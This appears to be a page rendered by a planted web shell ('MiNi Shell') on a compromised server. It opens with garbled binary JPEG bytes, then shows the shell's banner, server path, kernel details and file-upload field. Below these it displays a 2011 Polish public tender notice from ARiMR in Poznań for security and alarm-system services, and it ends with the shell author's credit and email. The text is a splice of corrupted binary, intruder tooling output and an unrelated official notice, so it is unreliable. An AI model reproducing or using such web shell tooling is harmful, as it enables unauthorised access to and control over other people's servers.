JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110316/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110316/85221-N-2011.html

<p class="kh_header"><b>Poznań: Świadczenie usług ochrony osób i mienia w Wielkopolskim Oddziale Regionalnym oraz biurach powiatowych Agencji Restrukturyzacji i Modernizacji Rolnictwa (ARiMR) znajdujących się na terenie województwa wielkopolskiego</b><br>
<b>Numer ogłoszenia: 85221 - 2011; data zamieszczenia: 16.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa Wielkopolski Oddział Regionalny , ul. Strzeszyńska 36, 60-479 Poznań, woj. wielkopolskie, tel. 061 8455660, faks 061 8400693.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arimr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Agencja płatnicza.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług ochrony osób i mienia w Wielkopolskim Oddziale Regionalnym oraz biurach powiatowych Agencji Restrukturyzacji i Modernizacji Rolnictwa (ARiMR) znajdujących się na terenie województwa wielkopolskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia obejmuje:
1)	świadczenie usług monitoringu elektronicznego z dojazdem załóg interwencyjnych dla obiektów Wielkopolskiego Oddziału Regionalnego (WOR) Agencji Restrukturyzacji i Modernizacji Rolnictwa (ARiMR) i biur powiatowych ARiMR na terenie województwa Wielkopolskiego, w których system zabezpieczeń wykrył zagrożenie (33 obiekty);
2)	naprawy, rozbudowy oraz modernizacje niżej wymienionych systemów zabezpieczeń (zwanych dalej w umowie systemami zabezpieczeń) zlokalizowanych w obiektach Wielkopolskiego Oddziału Regionalnego ARiMR i biurach powiatowych ARiMR na terenie województwa Wielkopolskiego (33 obiekty):
a)	System Kontroli Dostępu (SKD),
b)	System Sygnalizacji Włamania i Napadu (SSWiN),
c)	System Telewizji Dozorowej w obiektach Wielkopolskiego Oddziału Regionalnego ARiMR przy ul. Strzeszyńskiej 29 i ul. Strzeszyńskiej 36 (CCTV) (W przypadku montażu systemu CCTV w innych obiektach Zamawiającego Wykonawca bez zwiększania wynagrodzenia automatycznie obejmie umową również nowe systemy),
d)	System transmisji sygnałów alarmowych,
e)	System przeciw pożarowy (p.poż);
3)	okresowe przeglądy i konserwacje wymienionych w pkt 2 systemów zabezpieczeń  zlokalizowanych w obiektach Wielkopolskiego Oddziału Regionalnego ARiMR i biurach powiatowych ARiMR na terenie województwa Wielkopolskiego (33 obiekty);.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 79.71.10.00-1, 45.31.20.00-7, 45.31.21.00-8, 45.31.22.00-9, 31.62.50.00-3, 31.62.53.00-6, 35.12.17.00-5, 50.61.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Oferta musi być zabezpieczona wadium w wysokości 9 000 zł (słownie: dziewięć tysięcy złotych).
2.	Wadium należy wnieść na okres związania ofertą tj. 30 dni. Termin 30 dniowy liczy się od dnia składania ofert. 
3.	Wadium wnosi się przed upływem terminu składania.
4.	Wadium może być wniesione w jednej lub kilku formach, o których stanowi art. 45 ust. 6 ustawy Pzp:
a)	pieniądzu;
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).
5.	Wadium wniesione w pieniądzu wpłaca się przelewem na wydzielony rachunek bankowy Zamawiającego - BGŻ S.A. o/Poznań 49 2030 0045 1110 0000 0043 8730 z dopiskiem: wadium - przetarg na usługę ochrony osób i mienia. 
6.	O uznaniu przez Zamawiającego, że wadium w pieniądzu wpłacono w wymaganym terminie decyduje moment wpływu środków na rachunek Zamawiającego (tzn. że przed upływem terminu składania ofert środki pieniężne powinny być w posiadaniu Zamawiającego).
7.	Wadium wnoszone w innych formach niż pieniądz (gwarancje i poręczenia) należy złożyć w formie oryginału w siedzibie Wielkopolskiego Oddziału Regionalnego ARiMR przy ul. Strzeszyńskiej 36 w pokoju 407 (IV piętro) nie później niż do dnia wyznaczonego na składanie ofert do godz. 10.00. 
8.	Z treści gwarancji lub poręczenia powinno wynikać bezwarunkowe i płatne na każde pisemne żądanie Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i ust. 5 ustawy Pzp tzn:
a)	 art. 46 ust. 4a tzn: Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie;
b)	art. 46 ust. 5 ustawy Pzp tzn: Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:  
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
9.	W przypadku wniesienia wadium w pieniądzu do oferty należy dołączyć potwierdzenie wniesienia wadium (oryginał lub kopia potwierdzona za zgodność z oryginałem), natomiast w przypadku wniesienia wadium w innej formie niż pieniądz np.: w formie gwarancji lub poręczenia do oferty należy dołączyć kopię dokumentu wadialnego potwierdzonego za zgodność z oryginałem przez Wykonawcę.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że posiada koncesje na wykonywanie usług ochrony osób i mienia wydaną zgodnie z ustawą z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (tekst jednolity: Dz. U. 2005 r. Nr 145 poz. 1221 z późn. zm.).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	prawidłowo wypełniony i podpisany przez Wykonawcę formularz ofertowy - załącznik nr 1,
b)	prawidłowo wypełniona i podpisana lub parafowana przez Wykonawcę Szczegółowa kalkulacja kosztów dojazdów - załącznik nr 1a,   
c)	prawidłowo wypełniona i podpisana lub parafowana przez Wykonawcę Szczegółowa kalkulacja części systemu zabezpieczeń - załącznik nr 1b,
d)	jeżeli oferta nie została podpisana przez osobę/y upoważnioną/e do tej czynności dokumentem rejestrowym, do oferty należy załączyć oryginał pełnomocnictwa do podpisywania oferty lub jego kopię potwierdzoną za zgodność z oryginałem przez Wykonawcę lub notarialnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający zastrzega sobie prawo do zmiany miejsca lokalizacji obiektów  objetych umową wymienionych w Tabeli nr 1 SIWZ oraz możliwość donajęcia dodatkowych powierzchni i pomieszczeń zlokalizowanych w jak i poza obiektami wymienionymi w Tabeli nr 1 SIWZ. W powyższym przypadku Wykonawca zobowiązany będzie bez zwiększania wynagrodzenia objąć obowiązkami wynikającymi z niniejszej umowy nowe obiekty, a w szczególności monitoringiem, przeglądami i konserwacjami oraz naprawami i obowiązkami wynikającymi z rozbudów i modernizacji. W przypadku zmiany miejsca lokalizacji lub objęcie przez Zamawiającego w posiadanie nowych obiektów, wówczas Zamawiający poinformuje o tych zmianach Wykonawcę osobnym pismem przesyłając jednocześnie zmodyfikowaną Tabelę nr 1. Powyższa zmiana nie wymaga aneksu i wchodzi ona w życie z momentem przesłania Wykonawcy nowej Tabeli nr 1, która automatycznie zastąpi  powyższą Tabelę. 
2. Zamawiający przewiduje mozliwość likwidacji linii telefonicznych analagowych. W przypadku, gdy Zamawiający nie będzie w posiadaniu linii analogowych na skutek ich likwidacji, wówczas Wykonawca na żądanie Zamawiającego dokona na własny koszt montażu drugiej linii GSM lub linii analogowej (w zależności od decyzji Zamawiającego) w każdym z chronionych obiektów wymienionych w Tabeli nr 1. Powyższe linie będą aktywowane na Wykonawcę. Koszty aktywacji jak i inne opłaty telekomunikacyjne obciążają Wykonawcę. Sytuacja taka może zaistnieć w przypadku całkowitej lub częściowej rezygnacji z korzystania z linii analogowych w jednostkach terenowych Zamawiającego. 
3. Zamawiający zastrzega sobie prawo zmiany zakresu czynności objętych przeglądem i konserwacją bez zmiany wynagrodzenia Wykonawcy, w przypadku zmiany wewnętrznych przepisów Zamawiającego regulujących ten przedmiot umowy lub w przypadku innych nieprzewidzianych zdarzeń. Powyższa zmiana nie wymaga aneksu i wchodzi ona w zastosowanie wraz z przesłaniem Wykonawcy nowego zakresu przeglądów i konserwacji. 
4. Zamawiający zastrzega sobie prawo do zwiększania kwot określonych w umowie w przypadku ich wyczerpania spowodowanego wzrostem ilości lub kosztów napraw, rozbudów i modernizacji systemów zabezpieczeń. W szczególności powyższe kwoty mogą być zwiększone w przypadku donajmowania nowych pomieszczeń, obiektów, zmiany ich przeznaczenia, wykonywania remontów i modernizacji, przenoszenia siedziby jednostki Zamawiającego określonej w Tabeli nr 1 SIWZ.
5. Zamawiający dopuszcza dokonywanie zmian umowy nie powodujących zmian treści oferty na podstawie której dokonano wyboru Wykonawcy.
6. Zamawiający dopuszcza również dokonywanie zmian korzystnych dla Zamawiającego jak np: zmniejszenie wynagrodzenia wykonawcy określonego w umowie.
7. Zamawiający zastrzega sobie prawo do rezygnacji z części obiektów objętych umową w przypadku rezygnacji z ich użytkowania. 
8.Zamawiający zastrzega sobie prawo do zmiany czasów dojazdów do poszczególnych jednostek określonych w Tabeli nr 1 w  przypadku przeniesienia jednostki poza miejscowość, w której znajduje się aktualna siedziba. Powyższego zapisu nie stosuje się do BP w Mianowicach.  Powyższe zmiany nie mogą naruszać zapisów umowy regulujących maksymalne czasu dojazdów do obiektów Zamawiającego. 
9. Zamawiający przewiduje możliwość zmiany zawartej umowy w następujących przypadkach:
a)	działania siły wyższej lub wystąpienia stanu wyższej konieczności,
b)	zmian organizacyjnych Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe,
c)	zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia,
d)	omyłek pisarskich lub błędów rachunkowych,
e)	powstania wątpliwości dotyczących treści umowy, jeśli będą one budziły sprzeczności interpretacyjne między stronami, wówczas strony zastrzegają sobie prawo dokonania zmian mających na celu ich wyjaśnienie,
f)	w przypadku wystąpienia sytuacji powodującej zagrożenie interesu Zamawiającego, Zamawiający zastrzega sobie prawo do zmiany umowy a w szczególności zmiany sposobu płatności, jeśli wymagać będzie tego ochrona interesu Zamawiającego.
10. Zamawiający przewiduje w ramach umowy możliwość zlecania Wykonawcy do realizacji rozbudowy lub modernizacje istniejących systemów zabezpieczeń, a w szczególności w przypadku zwiększenia powierzchni, któregokolwiek obiektu będącego w posiadaniu Zamawiającego określonego w Tabeli nr 1 SIWZ, bądź w przypadku wykonywania remontów, prac adaptacyjnych lub w przypadku wystąpienia innych okoliczności uzasadniających dokonanie rozbudowy lub modernizacji  systemów zabezpieczeń. Przez rozbudowę Zamawiający rozumie także kompleksowe wyposażanie nowego obiektu od podstaw w system zabezpieczeń oraz przeniesienie systemów zabezpieczeń ze starej lokalizacji do nowej lokalizacji Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arimr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można uzyskać w siedzibie Agencji Restrukturyzacji i Modernizacji Rolnictwa Wielkopolski Oddział Regionalny ARiMR, 60-479 Poznań, ul. Strzeszyńska 36 - pokój 407..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.03.2011 godzina 10:00, miejsce: Agencja Restrukturyzacji i Modernizacji Rolnictwa Wielkopolski Oddział Regionalny ARiMR, 60-479 Poznań, ul. Strzeszyńska 36 w kancelarii - pokój za Punktem Obsługi Klienta na parterze..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com